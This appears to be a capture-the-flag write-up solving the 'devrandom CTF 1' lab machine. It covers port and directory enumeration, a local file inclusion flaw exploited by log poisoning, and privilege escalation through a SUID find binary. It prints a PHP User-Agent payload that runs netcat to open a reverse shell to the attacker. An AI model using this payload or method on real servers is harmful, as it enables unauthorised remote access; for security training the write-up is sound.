devrandom CTF 1
In this article we are going to solve another boot2root challenge . This is a beginner level challenge . We can download this box from vulnhhub.
So as usual we are going to find the IP address of the target using the command : sudo netdiscover -i wlan0
Now by using the command nmap -A 192.168.43.45 we checked for the open ports and services running in the system.
As we can see that only 2 ports are open . So we decided to enumerate HTTP service , and the website has a very cool image in it that says website is closed . So we start enumerating more using directory bruteforce , command used : sudo dirb http://192.168.43.45
Now one by one we decided to open every webpage .
So now we have 3 entries in this file and we decided to open them. In the webpage /?include=info we found that it is vulnerable to LFI .
So now we tried to read different files in the system if we can get something useful but we found nothing . This is a LFI vulnerability and we can use log poisoning attack and from there we can have a reverse shell.
But to perform log poisoning attack we should be able to include some files like access.log or auth.log . So we decided to again run the directory bruteforce using dirbuster with extension php and we found the webpage /log.php
so we decided to open this file and found very interesting file in the very first line.
So now we have the path of access.log file and from here we can perform log poisoning attack!
So now we decided to open the file /var/www/html/access.log using LFI vulnerability .
Now we intercept the packet using burp suite , and to perform log poisoning attack we can tamper the User-Agent parameter and can inject our code there!
As we can see here that to take reverse shell we have injected our php code in User-Agent and now we have the reverse shell
code : <?php echo shell_exec('nc -e /bin/bash <your ip> <open port>'); ?>
Now we have our reverse shell and by using python-one-liner we get a shell.
Now privilege escalation part.
by typing ls we can see different files present in this directory and we found a interesting file secret.php and using the command cat secret.php we check its content and found the password of user victor in md5 hash format we decided to crack it and found the password to be irminsul .
Now we are in as user victor and we checked for the privileges using the command sudo -l but nothing was there . So we decided to check for SUID binary using the command : find / -perm -u=s -type f 2>/dev/null
/home/victor/bin/find is very helpful for us we change our directory to /home/victor/bin/find
As described in the gtfobins we can use this for privilege escalation . now we use the trick from gtfobins and we are in as user john
now we change our directory to /home/john and there we found a file with name .private and we checked the content of this file and we found text dropbox2010